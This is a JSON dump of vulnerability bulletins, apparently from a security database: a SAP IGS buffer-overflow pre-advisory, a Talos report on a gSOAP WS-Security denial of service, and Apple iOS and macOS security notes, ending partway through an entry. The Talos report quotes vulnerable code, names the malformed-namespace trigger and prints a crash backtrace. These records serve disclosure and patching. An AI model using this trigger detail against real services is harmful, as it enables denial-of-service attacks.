{"id": "SECURITYVULNS:DOC:13869", "bulletinFamily": "software", "title": "CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Remote Buffer Overflow", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n(The following advisory is also available in PDF format for download at:\r\nhttp://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_B\r\nuffer_Overflow.pdf )\r\n\r\nCYBSEC S.A.\r\nwww.cybsec.com\r\n\r\nPre-Advisory Name: SAP Internet Graphics Service (IGS) Remote Buffer Overflow\r\n==================\r\n\r\nVulnerability Class: Buffer Overflow\r\n====================\r\n\r\nRelease Date: 08/10/2006\r\n=============\r\n\r\nAffected Applications:\r\n======================\r\n* SAP IGS 6.40 Patchlevel <= 15\r\n* SAP IGS 7.00 Patchlevel <= 3\r\n\r\nAffected Platforms:\r\n===================\r\n* AIX 64 bits\r\n* HP-UX on IA64 64bit\r\n* HP-UX on PA-RISC 64bit\r\n* Linux on IA32 32bit\r\n* Linux on IA64 64bit\r\n* Linux on Power 64bit\r\n* Linux on x86_64 64bit\r\n* Linux on zSeries 64bit\r\n* OS/400 V5R2M0\r\n* Solaris on SPARC 64bit\r\n* TRU64 64bit\r\n* Windows Server on IA32 32bit\r\n* Windows Server on IA64 64bit\r\n* Windows Server on x64 64bit\r\n\r\nLocal / Remote: Remote\r\n===============\r\n\r\nSeverity: High\r\n=========\r\n\r\nAuthor: Mariano Nuñez Di Croce\r\n=======\r\n\r\nVendor Status:\r\n==============\r\n* Confirmed, update released.\r\n\r\nReference to Vulnerability Disclosure Policy:\r\n=============================================\r\nhttp://www.cybsec.com/vulnerability_policy.pdf\r\n\r\nProduct Overview:\r\n==================\r\n"The IGS provides a server architecture where data from an SAP System or other sources can be used to generate graphical or non-graphical output."\r\n\r\nIt is important to note that IGS is installed and activated by default with the Web Application Server (versions >= 6.30)\r\n\r\nVulnerability Description:\r\n==========================\r\nA specially crafted HTTP request can trigger a remote buffer overflow in SAP IGS service.\r\n\r\nTechnical Details:\r\n==================\r\nTechnical details will be released three months after publication of this pre-advisory. This was agreed upon with SAP to allow their customers to upgrade affected software prior to technical knowledge\r\nbeen publicly available.\r\n\r\nImpact:\r\n=======\r\nUnder UNIX systems, successful exploitation of this vulnerability may allow an attacker to execute remote code with the privileges of the SAP System Administrator account (<SID>adm), allowing him to\r\ntake full control of the SAP system installation.\r\n\r\nUnder Microsoft Windows systems, successful exploitation of this vulnerability may allow an attacker to execute remote code with the privileges of the LocalSystem account, allowing him to take full\r\ncontrol of the entire system.\r\n\r\nSolutions:\r\n==========\r\nSAP has released patches to address this vulnerability. Affected customers should apply the patches immediately.\r\nMore information can be found on SAP Note 968423.\r\n\r\nVendor Response:\r\n================\r\n* 06/02/2006: Initial Vendor Contact.\r\n* 06/09/2006: Vendor Confirmed Vulnerability.\r\n* 07/03/2006: Vendor Releases Update for version 6.40.\r\n* 07/13/2006: Vendor Releases Update for version 7.00.\r\n* 08/10/2006: Pre-Advisory Public Disclosure.\r\n\r\nSpecial Thanks:\r\n===============\r\nThanks goes to Carlos Diaz and Victor Montero.\r\n\r\nContact Information:\r\n====================\r\nFor more information regarding the vulnerability feel free to contact the author at mnunez {at} cybsec.com. Please bear in mind that technical details will be disclosed to the general public three\r\nmonths after the release of this pre-advisory.\r\n\r\nFor more information regarding CYBSEC: www.cybsec.com\r\n(c) 2006 - CYBSEC S.A. Security Systems\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.1 (GNU/Linux)\r\n\r\niD8DBQFE238ybbZGNCayCJkRAuKFAJ4x9eiykQZS7EvtjXBpZ41ibsKT4ACgqi8g\r\n5Yqr42pvuNEnNohuAqhUfiQ=\r\n=47q+\r\n-----END PGP SIGNATURE-----", "published": "2006-08-11T00:00:00", "modified": "2006-08-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13869", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 7, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2595", "CVE-2018-13869", "CVE-2017-13869", "CVE-2008-7273", "CVE-2015-9286", "CVE-2020-13869", "CVE-2008-7272"]}, {"type": "apple", "idList": ["APPLE:HT208327", "APPLE:HT208334", "APPLE:HT208331", "APPLE:HT208325"]}, {"type": "nessus", "idList": ["APPLETV_11_2.NASL", "MACOSX_SECUPD2017-005.NASL", "MACOS_10_13_2.NASL"]}, {"type": "seebug", "idList": ["SSV:96990"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145364"]}, {"type": "zdt", "idList": ["1337DAY-ID-29199"]}, {"type": "exploitdb", "idList": ["EDB-ID:43319"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812401"]}, {"type": "openbugbounty", "idList": ["OBB:230357"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 7.3}, "affectedSoftware": []}

{"talos": [{"lastseen": "2021-02-14T16:37:56", "bulletinFamily": "info", "cvelist": ["CVE-2020-13577"], "description": "# Talos Vulnerability Report\n\n### TALOS-2020-1188\n\n## Genivia gSOAP WS-Security plugin denial-of-service vulnerability\n\n##### January 5, 2021\n\n##### CVE Number\n\nCVE-2020-13577\n\n### Summary\n\nA denial-of-service vulnerability exists in the WS-Security plugin functionality of Genivia gSOAP 2.8.107. A specially crafted SOAP request can lead to denial of service. An attacker can send an HTTP request to trigger this vulnerability.\n\n### Tested Versions\n\nGenivia gSOAP 2.8.107\n\n### Product URLs\n\n<https://www.genivia.com/products.html#gsoap>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-476 - NULL Pointer Dereference\n\n### Details\n\nThe gSOAP toolkit is a C/C++ library for developing XML-based web services. It includes several plugins to support the implementation of SOAP and web service standards. The framework also provides multiple deployment options including modules for both IIS and Apache, standalone CGI scripts and its own standalone HTTP service.\n\nOne of the many plugins provided by gSOAP includes the wsse plugin for supporting the WS-Security specification. While procesing a RequestSecurityToken request, a denial of service condition can be triggered when processing XML namespaces. If the namespace was previuosly included and has no value, a null pointer dereference can occur.\n \n \n 13866 if ((soap->mode & SOAP_XML_CANONICAL))\n 13867 {\n 13868 /* push namespace */\n 13869 if (!strncmp(name, \"xmlns\", 5) && ((name[5] == ':') || name[5] == '\\0'))\n 13870 {\n 13871 (void)soap_push_ns(soap, name + 5 + (name[5] == ':'), value, 0, 0); <------ value is null and never checked before being saved.\n 13872 if (name[5] == '\\0')\n 13873 soap_utilize_ns(soap, SOAP_STR_EOS, 0);\n 13874 else if (soap->c14ninclude && ((*soap->c14ninclude == '*' || soap_tagsearch(soap->c14ninclude, name + 6))))\n 13875 soap_utilize_ns(soap, name, 0);\n 13876 }\n \n\n### Crash Information\n \n \n Starting program: /gsoap-2.8/gsoap/samples/wst/wstdemo ns 8080\n [Thread debugging using libthread_db enabled]\n Using host libthread_db library \"/lib/x86_64-linux-gnu/libthread_db.so.1\".\n Server started at port 8080\n Accepting connection from IP 127.0.0.1\n \n Program received signal SIGSEGV, Segmentation fault.\n __strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:174\n 174\t../sysdeps/x86_64/multiarch/../strcmp.S: No such file or directory.\n (gdb) bt\n #0 __strcmp_ssse3 () at ../sysdeps/x86_64/multiarch/../strcmp.S:174\n #1 0x00005555555b25f8 in soap_push_ns (soap=soap@entry=0x7ffff7fba010, id=0x55555583ef16 \"SOAP-ENV\", ns=ns@entry=0x0, utilized=utilized@entry=0, isearly=isearly@entry=0)\n at ../../stdsoap2.c:12677\n #2 0x00005555555b614d in soap_attribute (soap=soap@entry=0x7ffff7fba010, name=<optimized out>, name@entry=0x55555583ef10 \"xmlns:SOAP-ENV\", value=0x0) at ../../stdsoap2.c:13871\n #3 0x00005555555ca19f in soap_out_xsd__anyType (soap=soap@entry=0x7ffff7fba010, tag=0x555555837150 \"wst:RequestSecurityToken\", tag@entry=0x0, id=id@entry=0, node=node@entry=0x55555583ebb0,\n type=type@entry=0x0) at ../../dom.c:461\n #4 0x00005555555c9ed7 in soap_out_xsd__anyType (soap=soap@entry=0x7ffff7fba010, tag=0x55555583eac0 \"SOAP-ENV:Body\", tag@entry=0x0, id=id@entry=0, node=node@entry=0x55555583ea30,\n type=type@entry=0x0) at ../../dom.c:484\n #5 0x00005555555d1a26 in soap_wsse_verify_digest (soap=soap@entry=0x7ffff7fba010, alg=alg@entry=19, canonical=canonical@entry=1, id=<optimized out>,\n hash=hash@entry=0x7fffffffe0b0 \"\\260~\\207\\367\\060\") at ../../plugin/wsseapi.c:4276\n #6 0x00005555555d1e54 in soap_wsse_verify_SignedInfo (soap=soap@entry=0x7ffff7fba010) at ../../plugin/wsseapi.c:4161\n #7 0x00005555555d2180 in soap_wsse_verify_Signature (soap=soap@entry=0x7ffff7fba010) at ../../plugin/wsseapi.c:3845\n #8 0x00005555555d33ac in soap_wsse_preparefinalrecv (soap=0x7ffff7fba010) at ../../plugin/wsseapi.c:7659\n #9 0x00005555555c10b8 in soap_end_recv (soap=soap@entry=0x7ffff7fba010) at ../../stdsoap2.c:11512\n #10 0x00005555555a54e4 in soap_serve___wst__RequestSecurityToken (soap=soap@entry=0x7ffff7fba010) at soapServer.c:95\n #11 0x00005555555a5b0e in soap_serve_request (soap=soap@entry=0x7ffff7fba010) at soapServer.c:62\n #12 0x00005555555a5ba0 in soap_serve (soap=0x7ffff7fba010) at soapServer.c:37\n #13 0x000055555555af35 in main (argc=<optimized out>, argv=0x7fffffffe448) at wstdemo.c:186\n \n\n### Timeline\n\n2020-11-05 - Vendor Disclosure \n2020-12-16 - Vendor advised patch released on 2020-11-20 \n2021-01-05 - Public Release\n\n##### Credit\n\nDiscovered by a member of Cisco Talos. \n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1189\n\nPrevious Report\n\nTALOS-2020-1187\n", "edition": 2, "modified": "2021-01-05T00:00:00", "published": "2021-01-05T00:00:00", "id": "TALOS-2020-1188", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1188", "title": "Genivia gSOAP WS-Security plugin denial-of-service vulnerability", "type": "talos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "apple": [{"lastseen": "2020-12-24T20:41:20", "bulletinFamily": "software", "cvelist": ["CVE-2017-2411", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-7152", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-13080", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-13888", "CVE-2017-13880", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-13904", "CVE-2017-13891", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-13847", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-13874", "CVE-2017-13867", "CVE-2017-13879", "CVE-2017-7173", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13905", "CVE-2017-13885", "CVE-2017-13862", "CVE-2017-7164"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 11.2\n\nReleased December 2, 2017\n\n**App Store**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**Calculator**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to alter currency conversion rates\n\nDescription: Exchange rates were retrieved from HTTP rather than HTTPS. This was addressed by enabling HTTPS for exchange rates.\n\nCVE-2017-2411: Richard Shupak (linkedin.com/in/rshupak), Seth Vargo (@sethvargo) of Google, and an anonymous researcher\n\nEntry added May 2, 2018, updated June 14, 2018\n\n**CFNetwork Session**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\nEntry updated January 10, 2018\n\n**IOKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOMobileFrameBuffer**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13879: Apple\n\nEntry updated October 24, 2018\n\n**IOSurface**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An application may be able to execute arbitrary code with kernel privilege\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13880: Apple\n\nEntry added October 18, 2018\n\n**Mail**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Incorrect certificate is used for encryption\n\nDescription: A S/MIME issue existed in the handling of encrypted email. This issue was addressed through improved selection of the encryption certificate.\n\nCVE-2017-13874: Nicolas Devillard\n\nEntry updated April 9, 2018\n\n**Mail Drafts**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\n**Mail Message Framework**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-7152: Oliver Paukstadt of Thinking Objects GmbH (to.com)\n\nEntry added December 21, 2017\n\n**ReplayKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: A user may not have control over their screen broadcast\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13888: Dan Niemeyer of Microsoft, Peter Pau (ArcanaArt.com)\n\nEntry added June 21, 2018, updated September 8, 2020\n\n**SafariViewController**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-13891: Janne Raiskila (@raiskila)\n\nEntry added June 21, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 13, 2017, updated May 4, 2018\n\n**Wi-Fi**\n\nAvailable for: iPhone 6s, iPhone 6s Plus, iPhone 6, iPhone 6 Plus, iPhone SE, iPhone 5s, 12.9-inch iPad Pro 1st generation, iPad Air 2, iPad Air, iPad 5th generation, iPad mini 4, iPad mini 3, iPad mini 2, and iPod touch 6th generation \nReleased for iPhone 7 and later and iPad Pro 9.7-inch (early 2016) and later in [iOS 11.1](<https://support.apple.com/kb/HT208222>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\n\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 3, "modified": "2020-09-08T03:53:28", "published": "2020-09-08T03:53:28", "id": "APPLE:HT208334", "href": "https://support.apple.com/kb/HT208334", "title": "About the security content of iOS 11.2 - Apple Support", "type": "apple", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:41:48", "bulletinFamily": "software", "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. \n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project 